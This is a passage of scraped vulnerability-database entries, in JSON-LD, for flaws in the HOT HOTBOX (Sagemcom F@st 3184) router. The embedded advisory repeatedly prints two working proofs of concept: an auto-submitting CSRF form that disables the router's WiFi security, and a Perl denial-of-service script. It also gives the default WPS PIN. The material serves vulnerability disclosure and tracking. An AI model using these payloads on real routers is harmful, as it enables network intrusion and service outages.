        "data": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of      |\n|  HOT Cable communication company in israel.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-65041",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-5039",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "123901",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "63550",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29518",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "id": "VAR-201312-0133",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:26.830000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.hot.net.il/heb/Main/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.youtube.com/watch?v=cplt09zij48"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5039"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5039"
          },
          {
            "trust": 0.3,
            "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2013/nov/17"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
          },
          {
            "trust": 0.1,
            "url": "http://$host/goform/login\";"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxcsrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxdos.pl,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "date": "2013-11-04T13:03:33",
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "date": "2013-12-30T04:53:07.193000",
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "HOT HOTBOX Router Software  goform/wlanBasicSecurity Vulnerable to cross-site request forgery",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201312-0131

    Vulnerability from variot - Updated: 2025-04-11 22:48

    The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. There is a trust management vulnerability in HOT HOTBOX routers using version 2.1.11 software. A remote attacker can exploit this vulnerability to obtain sensitive information through EAP messages. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

    Vulnerabilities List -

    Default WPS Pin

    Authentication based on IP Address

    DoS via crafted POST

    Path/Directory Traversal

    Script injection via DHCP request

    No CSRF Token

    Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

    CSRF EXPLOIT:

    document.getElementById(1).submit();

    DENIAL OF SERVICE EXPLOIT:

    use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

    Author: Oz Elisyan

    Date: 3 September 2013

    Affected Version: <= 2.1.11

    print "# HOTBOX DoS PoC #\n\n"

    unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

    print "Sending Evil POST request...\n";

    my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

    print "Done.";

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0131",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 3.0,
            "vendor": "hot",
            "version": "2.1.11"
          },
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "hotbox router",
            "scope": null,
            "trust": 0.8,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "f@st router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sagecom",
            "version": "31842.1.11"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:hot:hotbox_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oz Elisyan",
        "sources": [
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2013-5037",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2013-5037",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2014-00015",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "VHN-65039",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-5037",
                "trust": 1.0,
                "value": "LOW"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-5037",
                "trust": 0.8,
                "value": "Low"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00015",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201312-560",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "VULHUB",
                "id": "VHN-65039",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. There is a trust management vulnerability in HOT HOTBOX routers using version 2.1.11 software. A remote attacker can exploit this vulnerability to obtain sensitive information through EAP messages.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
